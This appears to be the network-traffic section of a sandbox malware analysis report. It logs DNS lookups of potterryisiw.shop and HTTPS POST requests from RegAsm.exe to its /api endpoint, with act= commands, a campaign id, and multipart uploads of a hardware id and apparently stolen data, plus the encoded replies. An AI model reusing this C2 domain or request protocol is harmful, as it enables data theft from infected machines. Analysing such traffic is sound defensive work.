      Jul 1, 2024 09:23:58.772947073 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.258069038 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.258153915 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.262991905 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.263009071 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.263340950 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.264847040 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.265666962 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.265705109 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.265826941 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.265856028 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266005993 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266041040 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266158104 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266191959 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266531944 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266586065 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266753912 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266786098 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266802073 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266835928 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266881943 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266902924 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266923904 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.267030954 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.267061949 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.278678894 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.278918028 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.278954029 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.278964043 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.278991938 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.279011965 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.284048080 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.655746937 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.655853987 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.656167984 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.656186104 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658262014 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658288956 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.658371925 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658715010 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658726931 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.165406942 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.165471077 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.166763067 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.166769981 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.167005062 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.171936989 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.171967983 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.172044992 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.840889931 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.840986013 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.841029882 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.841214895 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.841214895 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.841231108 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.841239929 CEST44349720188.114.96.3192.168.2.5

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 1, 2024 09:23:34.103715897 CEST5317053192.168.2.51.1.1.1
      Jul 1, 2024 09:23:35.118236065 CEST5317053192.168.2.51.1.1.1
      Jul 1, 2024 09:23:35.261765003 CEST53531701.1.1.1192.168.2.5

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jul 1, 2024 09:23:34.103715897 CEST192.168.2.51.1.1.10x8881Standard query (0)potterryisiw.shopA (IP address)IN (0x0001)false
      Jul 1, 2024 09:23:35.118236065 CEST192.168.2.51.1.1.10x8881Standard query (0)potterryisiw.shopA (IP address)IN (0x0001)false

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jul 1, 2024 09:23:35.261765003 CEST1.1.1.1192.168.2.50x8881No error (0)potterryisiw.shop188.114.96.3A (IP address)IN (0x0001)false
      Jul 1, 2024 09:23:35.261765003 CEST1.1.1.1192.168.2.50x8881No error (0)potterryisiw.shop188.114.97.3A (IP address)IN (0x0001)false

      HTTP Request Dependency Graph

      • potterryisiw.shop

      HTTPS Proxied Packets

      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.549704188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:51 UTC264OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: potterryisiw.shop
      2024-07-01 07:23:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
      Data Ascii: act=life
      2024-07-01 07:23:51 UTC802INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:51 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=tqqp9phbopb7kpehflf611j2ta; expires=Fri, 25-Oct-2024 01:10:30 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqUFscdlFC7SXs2RwuPA9SNQNGWS1yJdeZdnWCiLRTX%2FXNSERLjK4ABwRT6%2FmQ5Yjexd8BaoAsYWl8Hv3tKb7qjUh2R69X8B19yuSLkeqeVDVpQchtrMfR22l33L5guN1qJaYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a72cda2343a0-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:51 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
      Data Ascii: 2ok
      2024-07-01 07:23:51 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.549707188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:52 UTC265OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 53
      Host: potterryisiw.shop
      2024-07-01 07:23:52 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d
      Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--default2806&j=
      2024-07-01 07:23:52 UTC810INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:52 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=p4k721qt8bl70757lnb4irhnd4; expires=Fri, 25-Oct-2024 01:10:31 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znQ%2BTPK5LxBTHKrMJemuETr6hjE1eABGelEkhgQzxC4HJR0FRP%2BSHI4eyj4Xk%2B4GJqKHkwbwesMotI4sBL1dGG59xLeioao25jCiuvWYaha%2FM2x3UnEM%2BZoI85UzXFZX%2FWVURg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a7343b994246-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:52 UTC559INData Raw: 63 65 34 0d 0a 56 74 41 44 56 2f 39 72 34 52 70 49 63 67 50 50 37 62 6b 4f 32 6d 34 75 58 4f 52 78 42 63 37 67 54 45 66 2b 73 35 76 38 4e 33 34 74 32 67 70 31 69 55 6e 62 4f 6e 78 65 43 63 62 50 79 6d 76 34 56 41 34 6f 6c 67 52 67 34 75 70 46 5a 5a 2f 58 75 63 59 58 47 44 65 38 63 44 4c 54 59 65 67 34 4c 51 6f 68 39 63 33 69 42 4e 4e 6e 56 58 7a 47 46 47 76 73 32 6d 78 6c 6d 39 6e 35 6e 56 73 63 4e 37 74 73 4a 35 4d 49 69 58 59 76 47 6d 61 73 69 64 68 69 74 77 74 4c 4f 59 55 62 61 36 65 4e 4a 43 72 63 6e 37 76 65 55 67 52 30 36 69 4e 31 73 67 36 56 65 77 55 54 63 4b 54 50 6d 58 50 32 5a 43 64 56 6e 31 45 6e 71 34 35 75 66 64 36 52 2b 70 6c 56 45 6a 43 30 61 44 2b 58 41 34 56 35 4c 42 68 7a 70 6f 76 52 5a 72 67 4b 52 7a 4f 4f 41 57 6d 6f 69 69 49 6b 6b 64
      Data Ascii: ce4VtADV/9r4RpIcgPP7bkO2m4uXORxBc7gTEf+s5v8N34t2gp1iUnbOnxeCcbPymv4VA4olgRg4upFZZ/XucYXGDe8cDLTYeg4LQoh9c3iBNNnVXzGFGvs2mxlm9n5nVscN7tsJ5MIiXYvGmasidhitwtLOYUba6eNJCrcn7veUgR06iN1sg6VewUTcKTPmXP2ZCdVn1Enq45ufd6R+plVEjC0aD+XA4V5LBhzpovRZrgKRzOOAWmoiiIkkd
      2024-07-01 07:23:52 UTC1369INData Raw: 78 73 38 43 45 78 6e 41 32 43 66 43 51 65 5a 61 47 4a 31 57 47 33 43 6b 59 2b 67 52 6c 76 70 49 4d 6a 4c 70 50 52 2f 4a 4e 52 47 6a 69 7a 5a 48 58 54 53 38 4e 2f 4d 6c 41 35 37 38 2f 31 61 37 73 65 44 67 75 46 48 57 6d 72 6c 47 35 6e 67 35 2b 52 39 54 34 46 64 76 4a 6d 4f 64 31 52 77 54 67 6b 46 57 36 2f 6a 73 6c 70 74 68 35 41 4f 34 41 65 5a 4b 4b 43 4b 79 4b 52 33 2f 2b 5a 56 68 51 77 73 32 38 35 6c 77 71 48 65 32 70 65 49 2b 32 49 77 79 7a 67 54 67 77 50 68 52 64 67 76 6f 45 67 5a 64 37 4f 74 2f 59 2b 64 79 33 77 49 54 4b 52 53 64 73 36 61 68 70 6e 6f 49 62 51 61 37 41 41 58 6a 57 4a 45 47 36 72 68 43 51 6d 6c 4e 76 2f 6b 46 51 62 4d 62 56 7a 4f 35 59 45 67 48 49 73 55 43 2f 76 7a 39 78 30 2b 46 51 4f 66 71 67 51 64 72 71 77 4c 54 53 4e 6b 62 75 42 47
      Data Ascii: xs8CExnA2CfCQeZaGJ1WG3CkY+gRlvpIMjLpPR/JNRGjizZHXTS8N/MlA578/1a7seDguFHWmrlG5ng5+R9T4FdvJmOd1RwTgkFW6/jslpth5AO4AeZKKCKyKR3/+ZVhQws285lwqHe2peI+2IwyzgTgwPhRdgvoEgZd7Ot/Y+dy3wITKRSds6ahpnoIbQa7AAXjWJEG6rhCQmlNv/kFQbMbVzO5YEgHIsUC/vz9x0+FQOfqgQdrqwLTSNkbuBG
      2024-07-01 07:23:52 UTC1369INData Raw: 55 4e 70 4d 48 68 47 35 71 55 6e 37 6a 35 37 41 48 6f 55 34 4d 4f 59 70 54 50 2b 37 43 49 69 79 63 32 76 4f 61 56 52 73 35 74 32 49 79 6e 67 53 45 63 69 51 58 5a 61 47 47 31 6d 71 34 43 30 67 37 6c 42 5a 75 6f 49 35 75 61 39 36 52 2f 6f 59 56 52 48 62 79 54 6a 4b 4c 43 71 78 37 4f 78 6b 68 37 35 43 56 42 4e 4e 6e 56 58 7a 47 46 47 76 73 32 6d 78 6c 6d 39 54 78 6c 56 4d 55 4e 4b 42 6b 4f 35 59 49 69 58 34 72 48 57 32 72 6a 39 70 73 76 67 42 4d 4f 59 45 42 64 61 6d 45 50 43 2f 63 6e 37 76 65 55 67 52 30 36 69 4e 31 71 78 6d 55 61 54 78 53 56 4b 36 42 31 57 75 75 54 41 34 68 79 48 73 4d 78 35 74 73 5a 5a 76 64 75 63 59 58 58 44 2b 79 62 54 4b 56 44 34 64 77 4a 52 39 6f 76 34 37 58 59 71 6f 4c 54 44 65 49 48 47 75 6c 6a 79 6b 6f 6c 39 76 30 6d 6c 49 64 64 50
      Data Ascii: UNpMHhG5qUn7j57AHoU4MOYpTP+7CIiyc2vOaVRs5t2IyngSEciQXZaGG1mq4C0g7lBZuoI5ua96R/oYVRHbyTjKLCqx7Oxkh75CVBNNnVXzGFGvs2mxlm9TxlVMUNKBkO5YIiX4rHW2rj9psvgBMOYEBdamEPC/cn7veUgR06iN1qxmUaTxSVK6B1WuuTA4hyHsMx5tsZZvducYXXD+ybTKVD4dwJR9ov47XYqoLTDeIHGuljykol9v0mlIddP
      2024-07-01 07:23:52 UTC10INData Raw: 41 49 35 2b 49 68 64 76 0d 0a
      Data Ascii: AI5+Ihdv
      2024-07-01 07:23:52 UTC1369INData Raw: 34 33 66 63 0d 0a 6f 49 54 64 5a 37 38 4c 53 6a 4f 4f 48 6d 4b 76 67 79 6f 76 6a 74 4c 79 6c 46 67 57 64 50 77 6a 64 5a 6f 52 77 79 42 6f 55 45 61 68 70 73 74 33 71 68 6f 4d 66 4a 6c 64 44 38 66 70 4e 32 66 63 31 76 58 65 44 56 35 30 73 57 34 38 6b 67 47 4c 64 79 55 55 62 36 75 4a 31 6d 6d 33 42 6c 34 32 69 42 35 73 6f 34 6b 38 4a 5a 48 56 39 5a 70 64 46 7a 37 79 4c 33 66 64 44 70 73 34 63 6c 49 68 6d 49 4c 55 62 4c 73 61 44 48 79 5a 58 51 2f 48 36 54 64 6e 33 4e 62 31 33 67 31 65 64 4c 35 76 4e 5a 49 46 6a 33 4d 69 45 57 32 6a 69 4e 35 6c 73 41 52 65 50 34 49 62 5a 71 4b 4e 4c 79 47 5a 31 50 32 5a 55 52 6f 37 38 69 39 33 33 51 36 62 4f 48 4a 53 49 59 4b 6f 37 69 36 5a 4e 67 78 38 6d 56 30 50 78 2b 6b 33 5a 39 7a 57 39 64 34 4e 58 6e 53 2b 59 6a 6d 56 42
      Data Ascii: 43fcoITdZ78LSjOOHmKvgyovjtLylFgWdPwjdZoRwyBoUEahpst3qhoMfJldD8fpN2fc1vXeDV50sW48kgGLdyUUb6uJ1mm3Bl42iB5so4k8JZHV9ZpdFz7yL3fdDps4clIhmILUbLsaDHyZXQ/H6Tdn3Nb13g1edL5vNZIFj3MiEW2jiN5lsAReP4IbZqKNLyGZ1P2ZURo78i933Q6bOHJSIYKo7i6ZNgx8mV0Px+k3Z9zW9d4NXnS+YjmVB
      2024-07-01 07:23:52 UTC1369INData Raw: 58 5a 36 75 4f 32 47 6d 37 43 55 6f 2f 68 68 39 74 71 34 6f 6b 4b 35 48 58 2f 5a 68 54 58 48 72 77 49 54 4b 46 53 64 73 36 61 69 4a 73 6f 34 62 59 61 72 55 61 5a 41 2f 47 55 58 6a 69 36 6b 56 4f 68 5a 4f 35 6d 56 6c 63 62 50 41 68 4d 5a 59 42 6a 33 30 69 46 57 43 6c 68 64 4e 6a 74 78 35 4e 4d 59 38 55 62 4b 47 4e 49 43 43 53 77 2f 36 56 58 68 51 39 76 47 64 31 30 30 76 44 66 7a 4a 51 4f 65 2f 50 37 57 2b 32 42 31 30 78 68 52 38 6e 37 70 31 67 54 66 65 36 34 4e 77 56 47 7a 6a 79 4f 58 66 64 41 34 68 38 4b 52 52 6b 6f 6f 37 61 61 71 6f 4c 52 53 79 49 48 6d 69 6b 69 69 63 6b 6d 4e 54 30 6d 46 6b 57 4e 62 56 76 4f 35 56 4a 7a 54 70 71 46 33 6e 74 31 35 6b 73 6d 52 78 58 4c 4a 41 65 52 71 47 4e 62 6d 65 44 6e 35 48 31 50 67 56 32 38 6d 59 35 33 56 48 42 4f 43
      Data Ascii: XZ6uO2Gm7CUo/hh9tq4okK5HX/ZhTXHrwITKFSds6aiJso4bYarUaZA/GUXji6kVOhZO5mVlcbPAhMZYBj30iFWClhdNjtx5NMY8UbKGNICCSw/6VXhQ9vGd100vDfzJQOe/P7W+2B10xhR8n7p1gTfe64NwVGzjyOXfdA4h8KRRkoo7aaqoLRSyIHmikiickmNT0mFkWNbVvO5VJzTpqF3nt15ksmRxXLJAeRqGNbmeDn5H1PgV28mY53VHBOC
      2024-07-01 07:23:52 UTC1369INData Raw: 7a 5a 74 69 73 51 31 45 4d 49 6f 62 59 37 36 43 4a 53 79 54 30 50 61 65 56 68 30 2b 75 6e 4d 7a 6e 51 4b 4c 66 79 49 55 62 37 2b 4f 31 43 7a 32 54 67 77 35 6e 6c 4d 2f 37 73 49 66 4d 35 76 57 39 74 78 38 47 79 2b 7a 61 7a 61 57 42 63 4d 36 4e 56 34 4a 78 75 54 43 4c 76 67 4c 51 48 37 65 55 53 65 68 6a 69 4d 68 6a 74 33 35 6e 6c 77 62 50 71 42 75 4f 70 41 4b 67 33 30 34 45 58 4f 69 68 4e 35 76 76 41 4e 44 4d 6f 34 5a 4a 2b 4c 41 62 69 4b 45 6b 61 48 63 46 54 41 33 6f 32 74 33 75 68 4f 56 66 79 59 42 61 71 43 44 6d 79 36 6e 51 69 52 56 37 51 6f 6c 37 49 55 69 5a 63 53 54 75 5a 35 55 45 53 61 33 59 44 2b 58 42 49 74 33 4c 78 56 75 71 59 76 51 59 71 6f 43 51 7a 36 41 47 47 61 70 67 53 55 76 6b 74 6a 72 33 68 74 65 64 4c 56 35 64 63 56 4c 77 31 49 78 45 57 79
      Data Ascii: zZtisQ1EMIobY76CJSyT0PaeVh0+unMznQKLfyIUb7+O1Cz2Tgw5nlM/7sIfM5vW9tx8Gy+zazaWBcM6NV4JxuTCLvgLQH7eUSehjiMhjt35nlwbPqBuOpAKg304EXOihN5vvANDMo4ZJ+LAbiKEkaHcFTA3o2t3uhOVfyYBaqCDmy6nQiRV7Qol7IUiZcSTuZ5UESa3YD+XBIt3LxVuqYvQYqoCQz6AGGapgSUvktjr3htedLV5dcVLw1IxEWy
      2024-07-01 07:23:52 UTC1369INData Raw: 72 4d 45 54 7a 43 4f 47 6d 65 69 67 69 38 6f 6e 4a 47 33 33 42 55 62 4c 50 49 35 64 39 30 73 6f 47 38 38 47 69 4f 4f 6d 4d 31 6d 76 77 42 61 4e 59 63 51 63 61 47 53 62 6d 65 44 6e 35 48 31 50 67 56 32 38 6d 59 35 33 56 48 42 4f 43 45 66 62 36 43 45 33 32 57 39 42 45 38 37 67 78 6c 72 6f 49 4d 6d 4c 4a 62 55 2f 4a 68 66 48 7a 71 39 59 44 6d 5a 41 49 31 78 61 6c 34 6a 37 59 6a 44 4c 4f 42 4f 44 41 69 57 46 48 2b 68 6b 6d 77 58 6e 38 44 6f 69 31 67 4d 4d 76 42 4f 4e 70 45 4b 68 6e 38 36 55 43 4f 79 77 62 4d 48 30 78 55 4f 66 6f 45 66 4a 2f 54 41 62 69 57 59 33 66 71 5a 57 78 4d 35 76 57 59 2b 6b 67 4f 4e 61 69 55 56 61 61 47 48 31 6e 36 79 42 6c 34 33 6a 78 35 70 70 4a 41 74 5a 64 4b 54 75 5a 6c 4e 58 47 7a 77 49 51 65 58 43 6f 39 75 4a 78 38 68 37 35 43 56
      Data Ascii: rMETzCOGmeigi8onJG33BUbLPI5d90soG88GiOOmM1mvwBaNYcQcaGSbmeDn5H1PgV28mY53VHBOCEfb6CE32W9BE87gxlroIMmLJbU/JhfHzq9YDmZAI1xal4j7YjDLOBODAiWFH+hkmwXn8Doi1gMMvBONpEKhn86UCOywbMH0xUOfoEfJ/TAbiWY3fqZWxM5vWY+kgONaiUVaaGH1n6yBl43jx5ppJAtZdKTuZlNXGzwIQeXCo9uJx8h75CV
      2024-07-01 07:23:52 UTC1369INData Raw: 31 7a 70 78 35 73 6f 49 38 68 4c 74 79 66 6b 66 55 2b 64 33 53 30 49 57 33 66 57 63 30 51 51 58 73 4b 37 59 76 4b 4c 4f 42 4f 48 47 7a 64 52 6a 54 37 30 6e 78 4e 39 37 72 6d 30 44 31 33 58 36 73 4a 58 76 5a 69 77 32 35 71 53 43 50 2f 77 62 4d 48 30 32 63 4d 4c 4d 5a 4c 4a 65 7a 46 4c 54 65 4f 31 2f 71 49 56 6c 73 4b 6a 45 49 69 69 77 4f 59 4f 67 77 58 63 4b 53 5a 31 6e 36 47 4d 6d 49 7a 68 78 42 70 37 72 4d 34 4b 49 7a 53 2f 4a 6c 72 49 6a 71 31 64 54 4b 54 44 34 4d 34 5a 48 67 4b 78 75 53 62 59 2f 68 55 44 67 66 47 57 79 65 54 7a 45 5a 4f 39 37 71 35 68 68 56 45 64 76 4a 55 4e 70 4d 48 68 47 34 37 58 55 4b 36 6d 64 46 33 2b 69 70 4c 4c 34 38 46 61 72 37 43 59 45 33 33 75 70 4c 65 55 31 78 73 38 44 46 37 39 57 4c 6f 45 32 6f 55 63 4f 33 58 6d 54 7a 71 56
      Data Ascii: 1zpx5soI8hLtyfkfU+d3S0IW3fWc0QQXsK7YvKLOBOHGzdRjT70nxN97rm0D13X6sJXvZiw25qSCP/wbMH02cMLMZLJezFLTeO1/qIVlsKjEIiiwOYOgwXcKSZ1n6GMmIzhxBp7rM4KIzS/JlrIjq1dTKTD4M4ZHgKxuSbY/hUDgfGWyeTzEZO97q5hhVEdvJUNpMHhG47XUK6mdF3+ipLL48Far7CYE33upLeU1xs8DF79WLoE2oUcO3XmTzqV


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.549708188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:53 UTC283OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 12841
      Host: potterryisiw.shop
      2024-07-01 07:23:53 UTC12841OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:53 UTC802INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=dnm6vqpne4qs4fq6qkspn06d75; expires=Fri, 25-Oct-2024 01:10:32 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0D439jtixhrdYxGAmNeYGRnF1o6QGWlfZGLtYbN%2BAOTz1EcLvMIdI7PRc7ne8tkfe3C4MjvH9Z37ZaLVAFDQ8GfkfPXiw3FOjus1nbf%2FHAJd3doIxbdSxcmgHs1W74wiQj2hGg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a73a6a3f3300-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:53 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:53 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.549709188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:54 UTC283OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 15083
      Host: potterryisiw.shop
      2024-07-01 07:23:54 UTC15083OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:54 UTC802INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=kn0726megd04ad2hpg8hvutmdp; expires=Fri, 25-Oct-2024 01:10:33 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
